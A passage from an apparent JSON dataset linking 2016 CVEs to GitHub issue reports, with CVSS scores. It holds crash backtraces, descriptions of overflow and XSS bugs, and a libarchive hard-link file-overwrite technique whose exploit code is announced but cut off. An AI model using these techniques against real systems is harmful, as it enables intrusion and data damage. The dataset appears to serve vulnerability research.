  2335. "description": "increase randomness on generate_key. Current functions used to generate random strings are not \"that much random\" (depending on the PHP version and operating system).",
  2336. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2337. "severity": "HIGH",
  2338. "baseScore": 8.1,
  2339. "impactScore": 5.9,
  2340. "exploitabilityScore": 2.2
  2341. },
  2342. {
  2343. "CVE_ID": "CVE-2016-3956",
  2344. "Issue_Url_old": "https://github.com/npm/npm/issues/8380",
  2345. "Issue_Url_new": "https://github.com/npm/npm/issues/8380",
  2346. "Repo_new": "npm/npm",
  2347. "Issue_Created_At": "2015-05-27T22:30:34Z",
  2348. "description": "npm uses auth token from registry on http[s]:// dependencies, breaking APITAG URLs. APITAG Excerpt from the log: APITAG further: ERRORTAG Removing auth token with npm logout helps. Apparently APITAG server reacts badly to foreign auth tokens. This issue has not been observed with npm NUMBERTAG",
  2349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2350. "severity": "HIGH",
  2351. "baseScore": 7.5,
  2352. "impactScore": 3.6,
  2353. "exploitabilityScore": 3.9
  2354. },
  2355. {
  2356. "CVE_ID": "CVE-2016-3958",
  2357. "Issue_Url_old": "https://github.com/golang/go/issues/14959",
  2358. "Issue_Url_new": "https://github.com/golang/go/issues/14959",
  2359. "Repo_new": "golang/go",
  2360. "Issue_Created_At": "2016-03-25T06:40:00Z",
  2361. "description": "syscall: guard against Windows DLL preloading attacks . Taru Karttunen noted that Go should be more paranoid by default when loading DLLs. Background: URLTAG Microsoft's guidelines: FILETAG APITAG docs: FILETAG MENTIONTAG proposed NUMBERTAG Change APITAG to call APITAG with APITAG instead of calling APITAG That is, APITAG is now secure by default and cannot load DLLs from the directory containing the executable NUMBERTAG Add a APITAG to PATHTAG so that users can still get at the old behavior if they want it (by appropriate passing of flags). CL forthcoming. /cc MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG",
  2362. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  2363. "severity": "HIGH",
  2364. "baseScore": 7.8,
  2365. "impactScore": 5.9,
  2366. "exploitabilityScore": 1.8
  2367. },
  2368. {
  2369. "CVE_ID": "CVE-2016-3995",
  2370. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/146",
  2371. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/146",
  2372. "Repo_new": "weidai11/cryptopp",
  2373. "Issue_Created_At": "2016-03-11T11:00:05Z",
  2374. "description": "Timing Attack Counter Measure AES. For both APITAG and APITAG there is some code to avoid timing attacks: ERRORTAG As far as I understand it, the goal is to do at least one read per cache line in order to preload Te into the cache. However when looking at the NUMBERTAG binary (obtained in the Debian package URLTAG , I noticed that if the loop structure remains, the memory reads have been optimized away: CODETAG This counter measure seems to be removed by the compiler. Hence, the binary may be vulnerable to timing attacks.",
  2375. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  2376. "severity": "HIGH",
  2377. "baseScore": 7.5,
  2378. "impactScore": 3.6,
  2379. "exploitabilityScore": 3.9
  2380. },
  2381. {
  2382. "CVE_ID": "CVE-2016-4040",
  2383. "Issue_Url_old": "https://github.com/dotCMS/core/issues/8840",
  2384. "Issue_Url_new": "https://github.com/dotcms/core/issues/8840",
  2385. "Repo_new": "dotcms/core",
  2386. "Issue_Created_At": "2016-04-07T12:12:18Z",
  2387. "description": "Further sortby sanitizing. We missed a single case when sanitizing the accepted sort by values in the workflow portlet.",
  2388. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  2389. "severity": "HIGH",
  2390. "baseScore": 7.2,
  2391. "impactScore": 5.9,
  2392. "exploitabilityScore": 1.2
  2393. },
  2394. {
  2395. "CVE_ID": "CVE-2016-4074",
  2396. "Issue_Url_old": "https://github.com/stedolan/jq/issues/1136",
  2397. "Issue_Url_new": "https://github.com/stedolan/jq/issues/1136",
  2398. "Repo_new": "stedolan/jq",
  2399. "Issue_Created_At": "2016-04-24T08:31:16Z",
  2400. "description": "Stack exhaustion parsing a JSON file. Hi, A crash caused by stack exhaustion parsing a JSON was found. It affects, at least version NUMBERTAG as well as the last git revision. To reproduce: $ gdb PATHTAG args jq . APITAG ... Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff NUMBERTAG fa7c2 in _IO_new_file_overflow (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , ch NUMBERTAG at APITAG NUMBERTAG fileops.c: No such file or directory. (gdb) bt NUMBERTAG ffff NUMBERTAG fa7c2 in _IO_new_file_overflow (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , ch NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG f NUMBERTAG a1 in _IO_new_file_xsputn (f NUMBERTAG ffff4b3f NUMBERTAG APITAG , data=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG eee6d in __GI__IO_fwrite (buf=<optimized out>, size NUMBERTAG count NUMBERTAG fp NUMBERTAG ffff4b3f NUMBERTAG APITAG ) at APITAG NUMBERTAG in put_buf (s NUMBERTAG fffff7ff0cc NUMBERTAG len NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG is_tty NUMBERTAG at APITAG NUMBERTAG c in put_char (c NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG T NUMBERTAG at APITAG NUMBERTAG ab1 in put_indent (n NUMBERTAG flags NUMBERTAG fout NUMBERTAG ffff4b3f NUMBERTAG APITAG , strout NUMBERTAG T NUMBERTAG at APITAG NUMBERTAG e in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG NUMBERTAG in jv_dump_term (C NUMBERTAG fffffffdf NUMBERTAG flags NUMBERTAG indent NUMBERTAG F NUMBERTAG ffff4b3f NUMBERTAG APITAG , S NUMBERTAG at APITAG APITAG stack frames follow...) Find attached a compressed JSON file to reproduce it (the total size of this file is NUMBERTAG kb, but it should be compressed in order to upload it here) Regards, Gustavo.",
  2401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2402. "severity": "HIGH",
  2403. "baseScore": 7.5,
  2404. "impactScore": 3.6,
  2405. "exploitabilityScore": 3.9
  2406. },
  2407. {
  2408. "CVE_ID": "CVE-2016-4074",
  2409. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/10263",
  2410. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/10263",
  2411. "Repo_new": "hashicorp/consul",
  2412. "Issue_Created_At": "2021-05-20T06:33:50Z",
  2413. "description": "Vunerability CVETAG on jq. Overview of the Issue Security tool scanned the APITAG NUMBERTAG docker image and found the following CVE: CVETAG Reproduction Steps Steps to reproduce this issue NUMBERTAG Get lastest APITAG NUMBERTAG docker image (we testes both latest and NUMBERTAG Use a security tool to scan for CVEs Environment Kubernetes version: AKS NUMBERTAG consul version NUMBERTAG and NUMBERTAG Security scan result Fixable CVETAG (CVSS NUMBERTAG found in component 'jq' (version NUMBERTAG r0) in container 'consul', resolved by version NUMBERTAG rc1 r0",
  2414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2415. "severity": "HIGH",
  2416. "baseScore": 7.5,
  2417. "impactScore": 3.6,
  2418. "exploitabilityScore": 3.9
  2419. },
  2420. {
  2421. "CVE_ID": "CVE-2016-4300",
  2422. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/718",
  2423. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/718",
  2424. "Repo_new": "libarchive/libarchive",
  2425. "Issue_Created_At": "2016-06-19T21:19:37Z",
  2426. "description": "Security Issue NUMBERTAG Placeholder for a security issue that is being investigated. A fix will be committed shortly.",
  2427. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2428. "severity": "HIGH",
  2429. "baseScore": 7.8,
  2430. "impactScore": 5.9,
  2431. "exploitabilityScore": 1.8
  2432. },
  2433. {
  2434. "CVE_ID": "CVE-2016-4302",
  2435. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/719",
  2436. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/719",
  2437. "Repo_new": "libarchive/libarchive",
  2438. "Issue_Created_At": "2016-06-19T21:21:21Z",
  2439. "description": "Security issue NUMBERTAG Placeholder for a security issue that is being investigated. A fix will be committed soon.",
  2440. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2441. "severity": "HIGH",
  2442. "baseScore": 7.8,
  2443. "impactScore": 5.9,
  2444. "exploitabilityScore": 1.8
  2445. },
  2446. {
  2447. "CVE_ID": "CVE-2016-4425",
  2448. "Issue_Url_old": "https://github.com/akheron/jansson/issues/282",
  2449. "Issue_Url_new": "https://github.com/akheron/jansson/issues/282",
  2450. "Repo_new": "akheron/jansson",
  2451. "Issue_Created_At": "2016-05-01T19:56:44Z",
  2452. "description": "Stack exhaustion parsing a JSON file. Hi, A crash caused by stack exhaustion parsing a JSON was found. It affects, at least version NUMBERTAG as well as the last git revision (and maybe others). To reproduce using jshon: $ python c 'print NUMBERTAG FILETAG $ gdb args ./jshon F FILETAG ... Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff4e NUMBERTAG in ?? () from PATHTAG (gdb) bt NUMBERTAG ffff4e NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff4e NUMBERTAG b7d in ?? () from PATHTAG NUMBERTAG ffff4e NUMBERTAG in malloc () from PATHTAG NUMBERTAG c NUMBERTAG in jsonp_malloc (size NUMBERTAG at APITAG NUMBERTAG f NUMBERTAG in json_array () at APITAG NUMBERTAG afd0 in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b4b2 in parse_value (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG NUMBERTAG b NUMBERTAG in parse_array (le NUMBERTAG fffffffe NUMBERTAG flags NUMBERTAG error NUMBERTAG fffffffe2e0) at APITAG APITAG stack frames follow...)",
  2453. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2454. "severity": "HIGH",
  2455. "baseScore": 7.5,
  2456. "impactScore": 3.6,
  2457. "exploitabilityScore": 3.9
  2458. },
  2459. {
  2460. "CVE_ID": "CVE-2016-4552",
  2461. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/5240",
  2462. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/5240",
  2463. "Repo_new": "roundcube/roundcubemail",
  2464. "Issue_Created_At": "2016-05-05T15:24:19Z",
  2465. "description": "Map Area Persistent XSS Vulnerability in mail content page,please confirm.. Steps to reproduce: Compose email content via HTML APITAG can use email sending tool or other webmail to send APITAG HTML content is below: APITAG Send the mail to roundcube mail system Log in to roundcube mail system and open the mail received Click the area near the image in the APITAG xss will be triggered The vulnerability can be triggered in APITAG The testing roundcube webmail version is APITAG is below: FILETAG The test screenshot link: URLTAG",
  2466. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2467. "severity": "MEDIUM",
  2468. "baseScore": 6.1,
  2469. "impactScore": 2.7,
  2470. "exploitabilityScore": 2.8
  2471. },
  2472. {
  2473. "CVE_ID": "CVE-2016-4629",
  2474. "Issue_Url_old": "https://github.com/openexr/openexr/issues/563",
  2475. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/563",
  2476. "Repo_new": "academysoftwarefoundation/openexr",
  2477. "Issue_Created_At": "2019-09-20T17:39:21Z",
  2478. "description": "CVETAG and CVETAG . These appear to be issues with improper use of the APITAG code, not vulnerabilities in the APITAG code itself, and both appear to be have been addressed by Apple in the OS.",
  2479. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2480. "severity": "CRITICAL",
  2481. "baseScore": 9.8,
  2482. "impactScore": 5.9,
  2483. "exploitabilityScore": 3.9
  2484. },
  2485. {
  2486. "CVE_ID": "CVE-2016-4796",
  2487. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/774",
  2488. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/774",
  2489. "Repo_new": "uclouvain/openjpeg",
  2490. "Issue_Created_At": "2016-05-06T06:08:07Z",
  2491. "description": "Heap Buffer Overflow in function color_cmyk_to_rgb of color.c. Title APITAG Heap Buffer Overflow in function color_cmyk_to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
  2492. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2493. "severity": "MEDIUM",
  2494. "baseScore": 5.5,
  2495. "impactScore": 3.6,
  2496. "exploitabilityScore": 1.8
  2497. },
  2498. {
  2499. "CVE_ID": "CVE-2016-4797",
  2500. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/733",
  2501. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/733",
  2502. "Repo_new": "uclouvain/openjpeg",
  2503. "Issue_Created_At": "2016-03-28T08:56:41Z",
  2504. "description": "division by zero (SIGFPE) error in opj_tcd_init_tile function (line NUMBERTAG of tcd.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG jp2 Starting program: PATHTAG o image.pgm i crashes NUMBERTAG jp2 [INFO] Start to read j2k main header NUMBERTAG INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fc NUMBERTAG d in opj_tcd_init_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG APITAG fraction NUMBERTAG sizeof_block NUMBERTAG manager NUMBERTAG e4) at PATHTAG NUMBERTAG if ((((OPJ_UINT NUMBERTAG l_data_size) < (OPJ_UINT NUMBERTAG l_tilec >y1 l_tilec >y0)) { (gdb) p l_data_size NUMBERTAG gdb) bt NUMBERTAG b7fc NUMBERTAG d in opj_tcd_init_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG APITAG fraction NUMBERTAG sizeof_block NUMBERTAG manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG b in opj_tcd_init_decode_tile (p_tcd NUMBERTAG p_tile_no NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG be in opj_j2k_read_tile_header (p_j2k NUMBERTAG p_tile_inde NUMBERTAG bfff9e NUMBERTAG p_data_size NUMBERTAG bfff9e NUMBERTAG p_tile NUMBERTAG bfff9e8c, p_tile_y NUMBERTAG bfff9e NUMBERTAG p_tile NUMBERTAG bfff9e NUMBERTAG p_tile_y NUMBERTAG bfff9e NUMBERTAG p_nb_comps NUMBERTAG bfff9e9c, p_go_on NUMBERTAG bfff9e NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of l_data_size is zero. The code ((OPJ_UINT NUMBERTAG l_data_size will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a jp2 file to generate the APITAG APITAG APITAG PATHTAG APITAG APITAG PATHTAG APITAG APITAG Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
  2505. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2506. "severity": "MEDIUM",
  2507. "baseScore": 5.5,
  2508. "impactScore": 3.6,
  2509. "exploitabilityScore": 1.8
  2510. },
  2511. {
  2512. "CVE_ID": "CVE-2016-4804",
  2513. "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/25",
  2514. "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/25",
  2515. "Repo_new": "dosfstools/dosfstools",
  2516. "Issue_Created_At": "2016-04-12T16:25:33Z",
  2517. "description": "Heap overflow in function APITAG The attached file will cause a heap overflow in the function read_fat (it's zip packed, because github only allows certain file types). This was found via fuzzing with american fuzzy lop and address sanitizer. Address Sanitizer error message / stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG be NUMBERTAG at pc NUMBERTAG e NUMBERTAG f bp NUMBERTAG ffde1e2f3b0 sp NUMBERTAG ffde1e2eb NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG be NUMBERTAG thread T NUMBERTAG e NUMBERTAG e in __asan_memset ( PATHTAG NUMBERTAG f NUMBERTAG in read_fat PATHTAG NUMBERTAG e NUMBERTAG c in main PATHTAG NUMBERTAG f5e7c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG c NUMBERTAG be NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  2518. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2519. "severity": "MEDIUM",
  2520. "baseScore": 6.2,
  2521. "impactScore": 3.6,
  2522. "exploitabilityScore": 2.5
  2523. },
  2524. {
  2525. "CVE_ID": "CVE-2016-4804",
  2526. "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/26",
  2527. "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/26",
  2528. "Repo_new": "dosfstools/dosfstools",
  2529. "Issue_Created_At": "2016-04-13T22:34:27Z",
  2530. "description": "heap out of bounds read in APITAG An invalid memory read (heap oob) can happen with a malformed filesystem in the function APITAG This was found with american fuzzy lop and address sanitizer. ASAN stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG fdc8 at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fff NUMBERTAG e NUMBERTAG sp NUMBERTAG fff NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG fdc8 thread T NUMBERTAG f NUMBERTAG in get_fat PATHTAG NUMBERTAG f NUMBERTAG in read_fat PATHTAG NUMBERTAG e NUMBERTAG c in main PATHTAG NUMBERTAG f NUMBERTAG fa NUMBERTAG af in __libc_start_main APITAG NUMBERTAG e8 in _start ( PATHTAG NUMBERTAG fdc8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  2531. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2532. "severity": "MEDIUM",
  2533. "baseScore": 6.2,
  2534. "impactScore": 3.6,
  2535. "exploitabilityScore": 2.5
  2536. },
  2537. {
  2538. "CVE_ID": "CVE-2016-4809",
  2539. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/705",
  2540. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/705",
  2541. "Repo_new": "libarchive/libarchive",
  2542. "Issue_Created_At": "2016-05-12T08:21:15Z",
  2543. "description": "memory allocate error. hi guys. I with use afl & asan found some exceptions with memory allocate.",
  2544. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2545. "severity": "HIGH",
  2546. "baseScore": 7.5,
  2547. "impactScore": 3.6,
  2548. "exploitabilityScore": 3.9
  2549. },
  2550. {
  2551. "CVE_ID": "CVE-2016-4855",
  2552. "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/274",
  2553. "Issue_Url_new": "https://github.com/adodb/adodb/issues/274",
  2554. "Repo_new": "adodb/adodb",
  2555. "Issue_Created_At": "2016-08-28T22:46:16Z",
  2556. "description": "XSS vulnerability in old test script. JPCERT Coordination Center (JPCERT/CC) URLTAG reported the following vulnerability in APITAG _As a workaround until hotfix is released, we recommend all users to remove the whole APITAG directory ; it is only used for development purposes and is not necessary for normal APITAG operations._ Report description APITAG Number] JVN NUMBERTAG APITAG APITAG vulnerable to cross site scripting APITAG Related Information] Anonymous (reporter information was not provided) APITAG Information] This vulnerability was found by the reporter Product Name: APITAG Version NUMBERTAG Language: PHP Description: Cross site scripting Reproduction Procedure: Environment used: OS: Windows NUMBERTAG Middleware: Most recent version of xampp Place the most recent version of xampp at APITAG Place APITAG at APITAG Using Chrome with the XSS filter turned off, access APITAG to reproduce the vulnerability. Here an alert dialog will appear. APITAG Impacts] Cookies may be stolen Pages may be defaced Other affects of XSS APITAG Workarounds] None APITAG of Concept Code] None APITAG Information] None APITAG Validation and Comments from IPA] None APITAG from JPCERT/CC] None",
  2557. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2558. "severity": "MEDIUM",
  2559. "baseScore": 6.1,
  2560. "impactScore": 2.7,
  2561. "exploitabilityScore": 2.8
  2562. },
  2563. {
  2564. "CVE_ID": "CVE-2016-4864",
  2565. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1077",
  2566. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1077",
  2567. "Repo_new": "h2o/h2o",
  2568. "Issue_Created_At": "2016-09-14T08:00:27Z",
  2569. "description": "Format String Vulnerability ( CVETAG ). Format string vulnerability exists in FILETAG upto and including version FILETAG NUMBERTAG URLTAG , that can be used by remote attackers to mount Denial of Service attacks. Users using one of the following handlers of H2O may be affected by the issue and are advised to __upgrade immediately to version FILETAG or NUMBERTAG URLTAG __. Affected handlers: FILETAG FILETAG FILETAG FILETAG FILETAG Deployments only using the FILETAG is not affected by the vulnerability.",
  2570. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2571. "severity": "HIGH",
  2572. "baseScore": 7.5,
  2573. "impactScore": 3.6,
  2574. "exploitabilityScore": 3.9
  2575. },
  2576. {
  2577. "CVE_ID": "CVE-2016-5060",
  2578. "Issue_Url_old": "https://github.com/naver/ngrinder/issues/103",
  2579. "Issue_Url_new": "https://github.com/naver/ngrinder/issues/103",
  2580. "Repo_new": "naver/ngrinder",
  2581. "Issue_Created_At": "2016-04-14T02:29:52Z",
  2582. "description": "Fix security issue. Fix ngrinder security issue.",
  2583. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2584. "severity": "MEDIUM",
  2585. "baseScore": 6.1,
  2586. "impactScore": 2.7,
  2587. "exploitabilityScore": 2.8
  2588. },
  2589. {
  2590. "CVE_ID": "CVE-2016-5116",
  2591. "Issue_Url_old": "https://github.com/libgd/libgd/issues/211",
  2592. "Issue_Url_new": "https://github.com/libgd/libgd/issues/211",
  2593. "Repo_new": "libgd/libgd",
  2594. "Issue_Created_At": "2016-05-13T05:35:49Z",
  2595. "description": "APITAG vsnprintf return value not checked leaks memory in PHP NUMBERTAG Description: See reproduction test case, length from the failed vsnprintf attempt NUMBERTAG to copy more than NUMBERTAG chars on a NUMBERTAG buffer, vsnprintf NUMBERTAG a return value of size or more means that the output was truncated\", however libgd returns this length as is and PHP prints more information from memory than it should. Libgd isn't checking the vsnprintf return value and PHP NUMBERTAG will print the length specified, leaking memory data. ERRORTAG This was reported to PHP CVETAG Compile PHP NUMBERTAG with ASAN. BP on URLTAG CODETAG NUMBERTAG URLTAG NUMBERTAG URLTAG / Test script: APITAG Actual result: ERRORTAG",
  2596. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  2597. "severity": "CRITICAL",
  2598. "baseScore": 9.1,
  2599. "impactScore": 5.2,
  2600. "exploitabilityScore": 3.9
  2601. },
  2602. {
  2603. "CVE_ID": "CVE-2016-5301",
  2604. "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/780",
  2605. "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/780",
  2606. "Repo_new": "arvidn/libtorrent",
  2607. "Issue_Created_At": "2016-06-03T13:03:49Z",
  2608. "description": "Libtorrent crashes while parsing invalid chunked HTTP or APITAG response. libtorrent version (or branch NUMBERTAG platform/architecture: Linu NUMBERTAG compiler and compiler version: Ubuntu clang version NUMBERTAG PATHTAG ) (based on LLVM NUMBERTAG A specially crafted HTTP response from a tracker (or potentially a APITAG broadcast) can crash libtorrent in the APITAG function. This bug was found with AFL. Let me know if you need any more information or cannot reproduce. Base NUMBERTAG encoded HTTP response that should crash libtorrent: CODETAG APITAG output: ERRORTAG Valgrind output: ERRORTAG",
  2609. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2610. "severity": "HIGH",
  2611. "baseScore": 7.5,
  2612. "impactScore": 3.6,
  2613. "exploitabilityScore": 3.9
  2614. },
  2615. {
  2616. "CVE_ID": "CVE-2016-5418",
  2617. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/746",
  2618. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/746",
  2619. "Repo_new": "libarchive/libarchive",
  2620. "Issue_Created_At": "2016-07-21T03:42:34Z",
  2621. "description": "Hard links with data can evade sandboxing restrictions. This is the last of four libarchive bugs reported in Issue NUMBERTAG APITAG NUMBERTAG APITAG HEAD/ports NUMBERTAG APITAG non HEAD), possibly earlier APITAG Recall the three classes of filesystem attacks listed earlier NUMBERTAG absolute paths NUMBERTAG dot dot paths NUMBERTAG extraction through symlinks These checks are applied as usual to the pathnames of symlinks and hard links but not to their targets, with one exception: The targets of hard links are subjected to absolute path checks in tar/util.c as of APITAG revision r NUMBERTAG and upstream commit cf8e NUMBERTAG f (it seems the revision was submitted upstream and was rewritten in a different form as the commit both strip leading slashes from the hard link targets, though not for security reasons). Archive entries for hard links can use dot dot pathnames in their targets to point at any file on the system, subject to the usual hard linking constraints. Alternatively, on systems that follow symlinks for APITAG which is an implementation defined behavior supported by APITAG a symlink can first be extracted that uses absolute or dot dot pathnames to point at the file, and then the hard link target can be the symlink, which means that filtering the hard link target for dot dot paths is not sufficient to address the problem. The ability to point hard links at outside files becomes more serious when we consider that libarchive supports the POSIX feature of hard links with data payloads. This allows an attacker to point a hard link at an existing target file outside the extraction directory and use the data payload to overwrite the file. APITAG Exploit code is included below. $ cd /tmp/cage $ ls vuln4.c $ cc o vuln4 vuln4.c 